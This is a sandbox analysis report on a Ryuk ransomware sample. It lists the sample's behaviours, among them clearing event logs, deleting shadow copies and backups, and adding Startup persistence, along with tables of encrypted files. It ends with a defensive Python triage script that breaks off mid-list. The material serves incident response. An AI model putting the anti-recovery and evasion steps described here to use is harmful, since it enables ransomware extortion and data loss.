Malware Analysis Report

2024-08-06 09:28

Sample ID 230309-wzyvtsbc7t
Target 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
SHA256 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
Tags
ryuk discovery evasion ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09

Threat Level: Known bad

The file 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe was found to be: Known bad.

Malicious Activity Summary

ryuk discovery evasion ransomware

Ryuk

Clears Windows event logs

Deletes shadow copies

Modifies boot configuration data using bcdedit

Deletes backup catalog

Disables Task Manager via registry modification

Disables taskbar notifications via registry modification

Disables use of System Restore points

Modifies file permissions

Drops startup file

Checks computer location settings

Enumerates connected drives

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Creates scheduled task(s)

Views/modifies file attributes

Uses Volume Shadow Copy service COM API

Interacts with shadow copies

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Opens file in notepad (likely ransom note)

Runs net.exe

MITRE ATT&CK Matrix V6

Analysis: static1

Detonation Overview

Reported

2023-03-09 18:22

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-03-09 18:22

Reported

2023-03-09 18:24

Platform

win7-20230220-en

Max time kernel

150s

Max time network

30s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe"

Signatures

Ryuk

ransomware ryuk

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wevtutil.exe N/A (64 separate launches)

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A (2 separate launches)

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

evasion

Disables taskbar notifications via registry modification

evasion

Disables use of System Restore points

evasion

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\attrib.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\f: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\ProtectInitialize.rar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\QUAD\QUAD.ELM.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_SlateBlue.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152628.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0217872.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\form_edit.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\deploy\splash.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0222015.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Pushpin.eftx.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14792_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FLYERHM.POC.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\conticon.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\com-sun-tools-visualvm-modules-startup.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105398.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ps.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nassau.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jawt.lib.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02261_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\reflow.api.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.RSD.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099172.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18196_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21298_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\Updater6\AdobeAUM_rootCert.cer.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ICE\ICE.ELM.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14830_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR9F.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0285462.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_zh_CN.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RMNSQUE\PREVIEW.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02263_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Installed_resources14.xss.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL097.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\UpdateUnblock.mp2.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Srednekolymsk.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic_5.5.0.165303.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00513_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Horizon.thmx.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\jfr\profile.jfc.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\vlc.mo.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099181.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\TAB_OFF.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR27F.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107302.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIGN.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javafx.policy.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0195254.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\viewSelectionChanged.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL107.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-core-output2.xml_hidden.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02361_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\EXPSRV.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21320_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01607U.BMP.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\RyukReadMe.txt C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File created C:\Windows\hrmlog1 C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl C:\Windows\system32\wbadmin.exe N/A
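The "Drops file" tables above show the on-disk footprint a responder has to sort through after this sample runs: encrypted files renamed to `<original>.[<contact>].RYK`, the ransom note `RyukReadMe.txt` and the file `hrmlog1` written to `C:\Windows`, and `ryuk.exe` placed in the user's Startup folder. The following is an added example (not sandbox output and not the malware's code) that classifies a list of host paths against exactly those patterns and recovers each encrypted file's pre-encryption path so it can be matched against backups. The bracketed contact in the extension is treated as opaque text because the report renders it only as a redacted placeholder; accepting a bare `.RYK` suffix as well is a generalisation beyond this report. The sample paths are taken from the tables above plus one constructed bare-`.RYK` path.

```python
import re
from collections import Counter

# Naming scheme seen in this detonation: <original path>.[<contact>].RYK.
# The contact text is opaque; a bare .RYK (no bracket) is also accepted,
# which goes beyond what this particular report shows.
ENCRYPTED_RE = re.compile(r"^(?P<orig>.+?)(?:\.\[(?P<contact>.+?)\])?\.RYK$", re.I)

# Fixed-name files the sample wrote to C:\Windows in this detonation.
ARTIFACTS = {
    "ryukreadme.txt": "ransom note",
    "hrmlog1": "file written by the sample alongside the note",
}
STARTUP_MARKER = "\\start menu\\programs\\startup\\"


def original_path(path):
    """Return the pre-encryption path for an encrypted file, else None."""
    folder, sep, name = path.rpartition("\\")
    m = ENCRYPTED_RE.match(name)
    if not m:
        return None
    return folder + sep + m.group("orig")


def classify_path(path):
    """Categorise one path as encrypted / artifact / startup-persistence / unclassified."""
    name = path.rpartition("\\")[2]
    orig = original_path(path)
    if orig is not None:
        base = orig.rpartition("\\")[2]
        ext = base.rpartition(".")[2].lower() if "." in base else "(none)"
        return ("encrypted", ext)
    low = name.lower()
    if low in ARTIFACTS:
        return ("artifact", ARTIFACTS[low])
    if STARTUP_MARKER in path.lower() and low.endswith(".exe"):
        return ("startup-persistence", name)
    return ("unclassified", "")


def triage(paths):
    """Summarise paths: what was encrypted, what to restore, what to remove."""
    summary = {"encrypted_by_ext": Counter(), "restore_map": {},
               "artifacts": [], "startup": [], "unclassified": []}
    for p in paths:
        cat, detail = classify_path(p)
        if cat == "encrypted":
            summary["encrypted_by_ext"][detail] += 1
            summary["restore_map"][p] = original_path(p)
        elif cat == "artifact":
            summary["artifacts"].append(p)
        elif cat == "startup-persistence":
            summary["startup"].append(p)
        else:
            summary["unclassified"].append(p)
    return summary


# Sample input: rows copied from the report's file tables, plus one
# constructed bare-.RYK path to exercise the contact-less form.
SAMPLE_PATHS = [
    r"C:\Program Files\7-Zip\Lang\ps.txt.[[email protected]].RYK",
    r"C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nassau.[[email protected]].RYK",
    r"C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152628.WMF.[[email protected]].RYK",
    r"C:\Windows\RyukReadMe.txt",
    r"C:\Windows\hrmlog1",
    r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe",
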